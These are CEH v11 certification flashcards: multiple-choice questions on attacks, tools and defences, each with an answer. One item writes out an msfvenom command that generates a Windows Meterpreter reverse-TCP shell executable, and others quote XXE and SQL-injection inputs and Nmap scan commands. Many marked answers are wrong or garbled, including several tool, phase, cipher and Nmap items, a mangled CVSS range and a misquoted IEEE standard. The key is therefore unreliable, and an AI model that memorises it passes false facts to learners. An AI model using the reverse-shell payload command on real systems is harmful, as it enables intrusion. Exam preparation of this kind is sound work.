CEH v11 Q1 Flashcards

1
Q
  1. Which of the following web vulnerabilities would an attacker be attempting to exploit if they delivered the following
    input? ‘ ] > ‘

SQLi
XXS
IDOR
XXE

A

XXE

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q
  1. Which Nmap switch helps evade IDS or firewalls?
  • n/-R
  • D
  • oN/-oX/-oG
  • T
A

-D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q
  1. Which of the following types of SQL injection attacks extends the results returned by the original query, enabling
    attackers to run two or more statements if they have the same structure as the original one?

Error-based injection
Boolean-based blind SQL injection
Union SQL injection
Blind SQL injection

A

Union SQL injection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q
  1. Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and
    location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her
    acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers
    information to perform other sophisticated attacks.
    What is the tool employed by James in the above scenario?

VisualRoute
Hootsuite
Ophcrack
HULK

A

Hootsuite

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q
  1. Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies,
    such as libraries and configuration files, binaries, and other resources that run independently from other processes
    in the cloud environment. For the containerization of applications, he follows the five-tier container technology
    architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the
    registries.
    Which of the following tiers of the container technology architecture is Abel currently working in?

Tier-2: Testing and accreditation systems
Tier-3: Registries
Tier-1: Developer machines
Tier-4: Orchestrators

A

Tier-1: Developer machines

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q
  1. During the enumeration phase, Lawrence performs banner grabbing to obtain information such as OS details and
    versions of services running. The service that he enumerated runs directly on TCP port 445.
    Which of the following services is enumerated by Lawrence in this scenario?

Telnet
Server Message Block (SMB)
Remote procedure call (RPC)
Network File System (NFS)

A

Server Message Block (SMB)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q
  1. What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444-f c
msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c

A

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q
  1. Keatron performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active
    systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the
    network.
    What is the type of vulnerability assessment did Keatron perform on the target organization?

Credentialed assessment
Passive assessment
Internal assessment
External assessment

A

Passive assessment

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q
  1. Bobby targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network
    using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these
    techniques, he successfully deployed malware on the target system to establish an outbound connection. What APT lifecycle
    phase is currently executing?

Cleanup
Preparation
Initial intrusion
Persistence

A

Persistence

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q
  1. At what stage of the cyber kill chain theory model does data exfiltration occur?

Weaponization
Actions on objectives
Command and control
Installation

A

Actions on objectives ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q
  1. Jason, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and
    passwords are shared in plaintext, making the way for hackers to perform successful session hijacking. To address this situation,
    Jason implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by
    Jason?

IP
FTPS
FTP
HTTPS

A

HTTPS ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q
  1. This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive
    data, such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve.
    Which is this wireless security protocol?

WPA2-Enterprise
WPA3-Personal
WPA2-Personal
WPA3-Enterprise

A

WPA3-Enterprise ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q
  1. What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android
    application?

APK.info
classes.dex
resources.asrc
AndroidManifest.xml

A

AndroidManifest.xml ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q
  1. You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site
    but only want results that show file extensions.
    What Google dork operator would you use?

inurl
filetype
ext
site

A

filetype ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q
  1. Alice, a professional hacker, targeted an organization’s cloud services. She infiltrated the target’s MSP provider by sending
    spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud
    service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored
    them in the MSP. Then, she used this information to launch further attacks on the target organization.
    Which of the following cloud attacks did Alice perform in the above scenario?

Cloudborne attack
Cloud hopper attack
Cloud cryptojacking
Man-in-the-cloud (MITC) attack

A

Cloud hopper attack ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q
  1. Susan, a software developer, wants her web API to update other applications with the latest information. For this purpose, she
    uses a user-defined HTTP callback or push APIs that are raised based on trigger events; when invoked, this feature supplies data
    to other applications so that users can instantly receive real-time information.
    Which of the following techniques is employed by Susan?

Webhooks
REST API
Web shells
SOAP API

A

REST API ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q
  1. In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key
    consists of 56 bits. Which is this encryption algorithm?

Triple Data Encryption Standard
MD5 encryption algorithm
IDEA
AES

A

Triple Data Encryption Standard ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q
  1. Richard, an attacker, targets an MNC. In this process, he uses a footprinting technique to gather as much information as
    possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry
    date, and creation date. With this information, he creates a map of the organization’s network and misleads domain owners with
    social engineering to obtain internal details of its network.
    What type of footprinting technique is employed by Richard?

VoIP footprinting
Email footprinting
Whois footprinting
VPN footprinting

A

Whois footprinting ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q
  1. An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but
    redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?

Spoofing
Vishing
Phishing
DDoS

A

Phishing ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q
  1. Robin, a professional hacker, targeted an organization’s network to sniff all the traffic. During this process, Robin plugged in a
    rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root
    bridge that will later allow him to sniff all the traffic in the network.
    What is the attack performed by Robin in the above scenario?

STP attack
ARP spoofing attack
VLAN hopping attack
DNS poisoning attack

A

STP attack ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q
  1. Bobby, an attacker, targeted a user and decided to hijack and intercept all their wireless communications. He
    installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used this virtual
    tower to interrupt the data transmission between the user and real tower, attempting to hijack an active session.
    Upon receiving the user’s request, Bobby manipulated the traffic with the virtual tower and redirected the victim to a
    malicious website.
    What is the attack performed by Bobby in the above scenario?

KRACK attack
Wardriving
Jamming signal attack
aLTEr attack

A

aLTEr attack ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q
  1. Dorian is sending a digitally signed email to Polly. With which key is Dorian signing this message and how is Poly validating it?

Dorian is signing the message with Poly’s private key, and Poly will verify that the message came from Dorian by using
Dorian’s public key.

Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian’s
private key.

Dorian is signing the message with Poly’s public key, and Poly will verify that the message came from Dorian by using
Dorian’s public key.

Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by
using Dorian’s public key.

A

Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by
using Dorian’s public key.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q
  1. Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application
    she is working on. She utilizes a component that can process API requests and handle various Docker objects, such
    as containers, volumes, images, and networks.
    What is the component of the Docker architecture used by Annie in the above scenario?

Docker client
Docker daemon
Docker object
Docker registries

A

Docker daemon ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q
  1. What is the common name for a vulnerability disclosure program opened by companies in platforms such as
    HackerOne?

Bug bounty program
White-hat hacking program
Vulnerability hunting program
Ethical hacking program

A

Bug bounty program ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q
  1. Which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device
    through Bluetooth?

Bluesnarfing
Bluesmacking
Bluebugging
Bluejacking

A

Bluesnarfing ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q
  1. While testing a web application in development, you notice that the web server does not properly ignore the “dot
    dot slash” (../) character string and instead returns the file listing of a folder higher up in the folder structure of the
    server.
    What kind of attack is possible in this scenario?

SQL injection
Cross-site scripting
Directory traversal
Denial of service

A

Directory traversal ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q
  1. While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption, “Learn more
    about your friends!”, as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms
    that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A
    few days later, Matt’s bank account has been accessed, and the password has been changed.
    What most likely happened?

Matt inadvertently provided the answers to his security questions when responding to the post.
Matt inadvertently provided his password when responding to the post.
Matt’s bank-account login information was brute forced.
Matt’s computer was infected with a keylogger.

A

Matt inadvertently provided the answers to his security questions when responding to the post. ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q
    1. Victim opens the attacker’s web site.
  1. Attacker sets up a web site which contains interesting and attractive content like ‘Do you want to make $1000 in a
    day?’.
  2. Victim clicks to the interesting and attractive content URL.
  3. Attacker creates a transparent ‘iframe’ in front of the URL which the victim attempts to click, so the victim thinks
    that he/she clicks on the ‘Do you want to make $1000 in a day?’ URL but actually he/she clicks on the content or URL
    that exists in the transparent ‘iframe’ which is setup by the attacker.
    What is the name of the attack which is mentioned in the scenario?

Session Fixation
ClickJacking Attack
HTML Injection
HTTP Parameter Pollution

A

ClickJacking Attack ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q
  1. An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the
    organization by building an inventory of the protocols found on the organization’s machines to detect which ports are
    attached to services such as an email server, a web server, or a database server. After identifying the services, he
    selected the vulnerabilities on each machine and started executing only the relevant tests.
    What is the type of vulnerability assessment solution that James employed in the above scenario?

Product-based solutions
Service-based solutions
Inference-based assessment
Tree-based assessment

A

Inference-based assessment ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q
  1. Samuel a security administrator, is assessing the configuration of a web server. He noticed that the server
    permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2
    connections. This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key
    information.
    Which of the following attacks can be performed by exploiting the above vulnerability?

DROWN attack
DUHK attack
Padding oracle attack
Side-channel attack

A

DROWN attack ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q
  1. In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability
    fall in?
  2. 0–6.9
  3. 0–6.0
  4. 0–6.9
  5. 9–6.9
A

4.0–6.9 ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q
  1. You start performing a penetration test against a specific website and have decided to start from grabbing all the
    links from the main page.
    What is the best Linux pipe to achieve your milestone?

dirb https://site.com | grep “site”
wget https://site.com | grep “< a href="http” | grep “site.com”
curl -s https://site.com | grep “< a href="http” | grep “site.com” | cut -d “"” -f 2
wget https://site.com | cut –d “http”

A

wget https://site.com | cut –d “http” ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q
  1. SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and
    allow attackers to access and/or modify data attached to a web application.
    Which of the following SQLi types leverages a database server’s ability to make DNS requests to pass data to an
    attacker?

In-band SQLi
Time-based blind SQLi
Union-based SQLi
Out-of-band SQLi

A

Out-of-band SQLi ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q
  1. Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by
    sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts information
    such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources. He
    also checks if an email address was leaked using the haveibeenpwned.com API.
    Which of the following tools is used by Wilson in the above scenario?

Infoga
Netcraft
Factiva
ZoomInfo

A

Infoga ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q
  1. Allen, a professional pen tester, was hired by XpertTech Solutions to perform an attack simulation on the
    organization’s network resources. To perform the attack, he took advantage of the NetBIOS API and targeted the
    NetBIOS service. By enumerating NetBIOS, he found that port 139 was open and could see the resources that could
    be accessed or viewed on a remote system. He came across many NetBIOS codes during enumeration.
    Identify the NetBIOS code used for obtaining the messenger service running for the logged-in user?

< 00 >< 20 >< 03 >
< 1B >

A

< 03 > ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q
  1. To create a botnet, the attacker can use several techniques to scan vulnerable machines. The attacker first
    collects information about a large number of vulnerable machines to create a list. Subsequently, they infect the
    machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process
    runs simultaneously. This technique ensures the spreading and installation of malicious code in little time.
    Which technique is discussed here?

Hit-list scanning technique
Subnet scanning technique
Permutation scanning technique
Topological scanning technique

A

Permutation scanning technique ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q
  1. John wants to send Marie an email that includes sensitive information, and he does not trust the network that he
    is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this
    type of encryption?

Use Marie’s public key to encrypt the message.
Use Marie’s private key to encrypt the message.
Use his own private key to encrypt the message.
Use his own public key to encrypt the message.

A

Use Marie’s public key to encrypt the message. ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q
  1. What is the port to block first in case you are suspicious that an IoT device has been compromised?

443
80
48101
22

A

48101 ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q
  1. A penetration tester is performing the footprinting process and is reviewing publicly available information about
    an organization by using the Google search engine.
    Which of the following advanced operators would allow the pen tester to restrict the search to the organization’s
    web domain?

allinurl:]
[link:]
[site:]
[location:]

A

[site:] ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q
  1. After an audit, the auditors inform you that there is a critical finding that you must tackle immediately. You read the
    audit report, and the problem is the service running on port 389.
    Which service is this and how can you tackle the problem?

The findings do not require immediate actions and are only suggestions.
The service is SMTP, and you must change it to SMIME, which is an encrypted way to send emails.
The service is NTP, and you have to change it from UDP to TCP in order to encrypt it.
The service is LDAP, and you must change it to 636, which is LDAPS.

A

The service is LDAP, and you must change it to 636, which is LDAPS. ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q
  1. Attacker Steve targeted an organization’s network with the aim of redirecting the company’s web traffic to another
    malicious website. To achieve this goal, Steve performed DNS cache poisoning by exploiting the vulnerabilities in the
    DNS server software and modified the original IP address of the target website to that of a fake website. What is the
    technique employed by Steve to gather information for identity theft?

Pharming
Wardriving
Pretexting
Skimming

A

Pharming ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q
  1. Kevin, a professional hacker, wants to penetrate CyberTech Inc.’s network. He employed a technique, using which
    he encoded packets with Unicode characters. The company’s IDS cannot recognize the packets, but the target web
    server can decode them.
    What is the technique used by Kevin to evade the IDS system?

Desynchronization
Obfuscating
Session splicing
Urgency flag

A

Obfuscating ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q
  1. Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his
    session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later
    feeds the same session ID to the target employee. The session ID links the target employee to Boney’s account page
    without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive
    payment details entered in a form are linked to Boney’s account.

Session fixation attack
Forbidden attack
Session donation attack
CRIME attack

A

Session fixation attack ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q
  1. Jim, a professional hacker, targeted an organization that is operating critical industrial infrastructure. Jim used
    Nmap to scan open ports and running services on systems connected to the organization’s OT network. He used an
    Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered information such as
    the vendor name, product code and name, device name, and IP address.
    Which of the following Nmap commands helped Jim retrieve the required information?

nmap -Pn -sT –scan-delay 1s –max-parallelism 1 -p < Port List > < Target IP >
nmap -Pn -sT -p 46824 < Target IP >
nmap -Pn -sT -p 102 –script s7-info < Target IP >
nmap -Pn -sU -p 44818 –script enip-info < Target IP >

A

nmap -Pn -sT -p 102 –script s7-info < Target IP > ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q
  1. Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website,
    www.moviescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on
    predefined signatures. To evade any comparison statement, he attempted placing characters such as “’ or ‘1’=’1’” in
    any basic injection statement such as “or 1=1.”
    Identify the evasion technique used by Daniel in the above scenario.

Null byte
Variation
Char encoding
IP fragmentation

A

Char encoding ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q
  1. Ethical hacker Jane Doe is attempting to crack the password of the head of the IT department of ABC company.
    She is utilizing a rainbow table and notices upon entering a password that extra characters are added to the
    password after submitting.
    What countermeasure is the company using to protect against rainbow tables?

Password hashing
Password key hashing
Account lockout
Password salting

A

Password salting ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q
  1. Attacker Lauren has gained the credentials of an organization’s internal server system, and she was often logging
    in during irregular times to monitor the network activities. The organization was skeptical about the login times and
    appointed security professional Robert to determine the issue. Robert analyzed the compromised device to find
    incident details such as the type of attack, its severity, target, impact, method of propagation, and vulnerabilities
    exploited.
    What is the incident handling and response (IH&R) phase, in which Robert has determined these issues?

Eradication
Incident recording and assignment
Incident triage
Preparation

A

Incident triage ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q
  1. George is a security professional working for iTech Solutions. He was tasked with securely transferring sensitive
    data of the organization between industrial systems. In this process, he used a short-range communication protocol
    based on the IEEE 203.15.4 standard. This protocol is used in devices that transfer data infrequently at a low rate in a
    restricted area, within a range of 10–100 m.
    What is the short-range wireless communication technology George employed in the above scenario?

MQTT
LPWAN
Zigbee
NB-IoT

A

Zigbee ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q
  1. Taylor, a security professional, uses a tool to monitor her company’s website, analyze the website’s traffic, and
    track the geographical location of the users visiting the company’s website.
    Which of the following tools did Taylor employ in the above scenario?

Webroot
Web-Stat
WAFW00F
WebSite-Watcher

A

Web-Stat ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q
  1. Mr. Omkar performed tool-based vulnerability assessment and found two vulnerabilities. During further analysis,
    he found that those issues are not true vulnerabilities.
    What will you call these issues?

True negatives
False negatives
True positives
False positives

A

False positives ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q
  1. Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating
    and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and
    DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.
    What is the type of web-service API mentioned in the above scenario?

REST API
JSON-RPC
SOAP API
RESTful API

A

RESTful API ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q
  1. Jason, an attacker, targeted an organization to perform an attack on its Internet-facing web server with the
    intention of gaining access to backend servers, which are protected by a firewall. In this process, he used a URL
    https://xyz.com/feed.php?url=externalsite.com/feed/to to obtain a remote feed and altered the URL input to the local
    host to view all the local resources on the target server.
    What is the type of attack Jason performed in the above scenario?

Web server misconfiguration
Server-side request forgery (SSRF) attack
Website defacement
Web cache poisoning attack

A

Server-side request forgery (SSRF) attack ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q
  1. Widespread fraud at Enron, WorldCom, and Tyco led to the creation of a law that was designed to improve the
    accuracy and accountability of corporate disclosures. It covers accounting firms and third parties that provide
    financial services to some organizations and came into effect in 2002. This law is known by what acronym?

HIPAA
FedRAMP
SOX
PCI DSS

A

SOX ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q
  1. Bob was recently hired by a medical company after it experienced a major cyber security breach. Many patients
    are complaining that their personal medical records are fully exposed on the Internet and someone can find them
    with a simple Google search. Bob’s boss is very worried because of regulations that protect those data.
    Which of the following regulations is mostly violated?

ISO 2002
HIPPA/PHI
PCI DSS
PII

A

HIPPA/PHI ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q
  1. Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port
    scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and
    determines that an RST packet is sent in response by the target host, indicating that the port is closed.
    What is the port scanning technique used by Sam to discover open ports?

Xmas scan
TCP Maimon scan
ACK flag probe scan
IDLE/IPID header scan

A

TCP Maimon scan ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q
  1. A newly joined employee, Janet, has been allocated an existing system used by a previous employee. Before
    issuing the system to Janet, it was assessed by Martin, the administrator. Martin found that there were possibilities
    of compromise through user directories, registries, and other system parameters. He also identified vulnerabilities
    such as native configuration tables, incorrect registry or file permissions, and software configuration errors.
    What is the type of vulnerability assessment performed by Martin?

Database assessment
Host-based assessment
Distributed assessment
Credentialed assessment

A

Database assessment ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q
  1. John, a professional hacker, performs a network attack on a renowned organization and gains unauthorized
    access to the target network. He remains in the network without being detected for a long time and obtains sensitive
    information without sabotaging the organization.
    Which of the following attack techniques is used by John?

Advanced persistent threat
Insider threat
Diversion theft
Spear-phishing sites

A

Advanced persistent threat ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q
  1. Jane, an ethical hacker, is testing a target organization’s web server and website to identify security loopholes. In
    this process, she copied the entire website and its content on a local drive to view the complete profile of the site’s
    directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the
    website’s directories and gain valuable information.
    What is the attack technique employed by Jane in the above scenario?

Web cache poisoning
Session hijacking
Website defacement
Website mirroring

A

Website mirroring ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q
  1. In this attack, an adversary tricks a victim into reinstalling an already-in-use key. This is achieved by manipulating
    and replaying cryptographic handshake messages. When the victim reinstalls the key, associated parameters such as
    the incremental transmit packet number and receive packet number are reset to their initial values. What is this
    attack called?

Evil twin
KRACK
Wardriving
Chop chop attack

A

KRACK ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q
  1. If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do
    you know about the firewall you are scanning?

There is no firewall in place.
It is a stateful firewall.
This event does not tell you anything about the firewall.
It is a non-stateful firewall.

A

It is a stateful firewall. ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q
  1. Which iOS jailbreaking technique patches the kernel during the device boot so that it becomes jailbroken after
    each successive reboot?

Tethered jailbreaking
Semi-tethered Jailbreaking
Untethered jailbreaking
Semi-untethered Jailbreaking

A

Untethered jailbreaking ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q
  1. Garry is a network administrator in an organization. He uses SNMP to manage networked devices from a remote
    location. To manage nodes in the network, he uses MIB, which contains formal descriptions of all network objects
    managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and
    Lseries.mib or by entering the DNS library name and Lseries.mib. He is currently retrieving information from an MIB
    that contains object types for workstations and server services.
    Which of the following types of MIB is accessed by Garry in the above scenario?

MIB_II.MIB
DHCP.MIB
WINS.MIB
LNMIB2.MIB

A

LNMIB2.MIB ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q
  1. Clark, a professional hacker, was hired by an organization to gather sensitive information about its competitors
    surreptitiously. Clark gathers the server IP address of the target organization using Whois footprinting. Further, he
    entered the server IP address as an input to an online tool to retrieve information such as the network range of the
    target organization and to identify the network topology and operating system used in the network.
    What is the online tool employed by Clark in the above scenario?

ARIN
DuckDuckGo
Baidu
AOL

A

ARIN ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q
  1. Jim is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between
    the domains and avoid detection. Identify the behavior of the adversary in the above scenario.

Use of DNS tunneling
Data staging
Use of command-line interface
Unspecified proxy activities

A

Use of DNS tunneling ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q
  1. You are a penetration tester tasked with testing the wireless network of your client Brakeme SA. You are
    attempting to break into the wireless network with the SSID “Brakeme-Internal.” You realize that this network uses
    WPA3 encryption. Which of the following is a promising to exploit which might work?

Key reinstallation attack
Cross-site request forgery
AP misconfiguration
Dragonblood

A

Dragonblood ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q
  1. Henry is a cyber security specialist hired by BlackEye – Cyber Security Solutions. He was tasked with discovering
    the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a
    result, he obtained a TTL value, which indicates that the target system is running a Windows OS.
    Identify the TTL value Henry obtained, which indicates that the target OS is Windows.

64
255
138
128

A

128 ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q
  1. Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a
    restrictive firewall in the IPv4 range in a given target network.
    Which of the following host discovery techniques must he use to perform the given task?

ACK flag probe scan
TCP Maimon scan
UDP scan
ARP ping scan

A

ARP ping scan ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
67
Q
  1. Ralph, a professional hacker, targeted Jane, who had recently bought new systems for her company. After a few
    days, Ralph contacted Jane while masquerading as a legitimate customer support executive, informing that her
    systems need to be serviced for proper functioning and that customer support will send a computer technician. Jane
    promptly replied positively. Ralph entered Jane’s company using this opportunity and gathered sensitive information
    by scanning terminals for passwords, searching for important documents in desks, and rummaging bins. What is the
    type of attack technique Ralph used on Jane?

Impersonation
Eavesdropping
Shoulder surfing
Dumpster diving

A

Impersonation ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
68
Q
  1. In an attempt to increase the security of your network, you implement a solution that will help keep your wireless
    network undiscoverable and accessible only to those that know it.
    How do you accomplish this?

Delete the wireless network
Remove all passwords
Disable SSID broadcasting
Lock all users

A

Disable SSID broadcasting ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
69
Q
  1. Jane invites her friends Alice and John over for a LAN party. Alice and John access Jane’s wireless network
    without a password. However, Jane has a long, complex password on her router. What attack has likely occurred?

Wireless sniffing
Piggybacking
Evil twin
Wardriving

A

Evil twin ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
70
Q
  1. Which file is a rich target to discover the structure of a website during web-server footprinting?

index.html
Robots.txt
domain.txt
Document root

A

Robots.txt ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
71
Q
  1. John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services.
    He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames,
    addresses, departmental details, and server names to launch further attacks on the target organization.
    What is the tool employed by John to gather information from the LDAP service?

ike-scan
JXplorer
EarthExplorer
Zabasearch

A

JXplorer ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
72
Q
  1. Sam, a professional hacker, targeted an organization with intention of compromising AWS IAM credentials. He
    attempted to lure one of the employees of the organization by initiating fake calls while posing as a legitimate
    employee. Moreover, he sent phishing emails to steal the AWS IAM credentials and further compromise the
    employee’s account.
    What is the technique used by Sam to compromise the AWS IAM credentials?

Social engineering
Reverse engineering
Password reuse
Insider threat

A

Social engineering ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
73
Q
  1. This form of encryption algorithm is a symmetric key block cipher that is characterized by a 128-bit block size, and
    its key size can be up to 256 bits. Which among the following is this encryption algorithm?

Twofish encryption algorithm
Blowfish encryption algorithm
HMAC encryption algorithm
IDEA

A

IDEA ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
74
Q
  1. Bob, an attacker, has managed to access a target IoT device. He employed an online tool to gather information
    related to the model of the IoT device and the certifications granted to it.
    Which of the following tools did Bob employ to gather the above information?

EarthExplorer
Google image search
FCC ID search
search.com

A

FCC ID search ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
75
Q
  1. Alice needs to send a confidential document to her coworker, Bryan. Their company has public key infrastructure
    set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses __________ to encrypt the
    message, and Bryan uses _______________ to confirm the digital signature.

Alice’s public key; Alice’s public key
Bryan’s public key; Bryan’s public key
Bryan’s public key; Alice’s public key
Bryan’s private key; Alice’s public key

A

Bryan’s public key; Alice’s public key ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
76
Q
  1. David is a security professional working in an organization, and he is implementing a vulnerability management
    program in the organization to evaluate and control the risks and vulnerabilities in its IT infrastructure. He is
    currently executing the process of applying fixes on vulnerable systems to reduce the impact and severity of
    vulnerabilities.
    Which phase of the vulnerability-management life cycle is David currently in?

Remediation
Verification
Vulnerability scan
